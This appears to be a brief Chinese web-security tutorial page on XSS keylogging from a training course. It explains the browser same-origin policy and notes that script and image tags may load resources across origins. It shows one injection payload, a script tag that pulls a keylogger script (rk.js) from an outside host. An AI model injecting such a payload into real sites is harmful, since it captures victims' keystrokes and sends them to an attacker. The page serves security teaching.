img
XSS键盘记录
同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据是会被拒绝的。
同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。这是一个用于隔离潜在恶意文件的重要安全机制。
img
注意,资源文件不受影响:
<script src="...">
<img src="...">
<script src="http://fx.com/pikachu/pkxss/rkeypress/rk.js"></script>
参考:
http://blog.evalshell.com/2020/12/20/风炫安全web安全学习第二十五节课-利用xss键盘记录/
网友评论